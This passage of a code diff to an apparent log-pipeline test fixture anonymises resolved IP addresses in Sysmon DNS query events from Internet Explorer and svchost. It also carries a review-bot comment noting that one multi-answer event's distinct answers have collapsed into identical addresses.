@@ -7904,7 +7904,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
@@ -7934,7 +7934,7 @@ "ProcessId": "2736", "QueryName": "syndication.twitter.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;" + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;" } }, "log": { @@ -7955,7 +7955,7 @@ "ProcessId": "2736", "QueryName": "ade.googlesyndication.com", "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:19.578" }, 
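Review bot: The four A answers in `QueryResults` on the new side of @@ -7934 are all `::ffff:89.160.20.156`, so this fixture no longer shows whether the pipeline keeps every answer in `dns.answers`/`dns.resolved_ip` or silently collapses duplicates; the expected arrays for this event sit outside the hunk, so that cannot be confirmed here. The same collapse is in the `event.original` copy at @@ -7904, and harmlessly in the single-answer events at @@ -7955, -8037, -8224 and -8249. Since this very string already maps the other answers to 192.168.x.x addresses, the input fixture (not this expected file) could keep the answers distinct, e.g. a constructed `::ffff:89.160.20.156;::ffff:192.168.42.200;::ffff:192.168.42.136;::ffff:192.168.42.72;`, so the multi-answer case stays observable after regeneration.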
@@ -7974,7 +7974,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7987,7 +7987,7 @@ "@timestamp": "2021-05-05T15:30:51.712Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -8009,7 +8009,7 @@ "ProcessId": "356", "QueryName": "iecvlist.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;", + "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "provider_name": "Microsoft-Windows-Sysmon", 
@@ -8037,7 +8037,7 @@ "ProcessId": "844", "QueryName": "tsfe.trafficshaping.dsp.mp.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;", + "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe" }, "process": { 
@@ -8061,7 +8061,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -8196,7 +8196,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -8224,7 +8224,7 @@ "ProcessId": "1788", "QueryName": "v10.vortex-win.data.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;", + "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -8249,7 +8249,7 @@ "provider_name": "Microsoft-Windows-Sysmon", "opcode": "Info", "event_data": { - "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;", + "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe", "UtcTime": "2019-07-18 03:43:04.400", "ProcessGuid": "{fa4a0de6-b1a3-5d2f-0000-00102f440100}", 
@@ -8268,7 +8268,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -8608,7 +8608,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 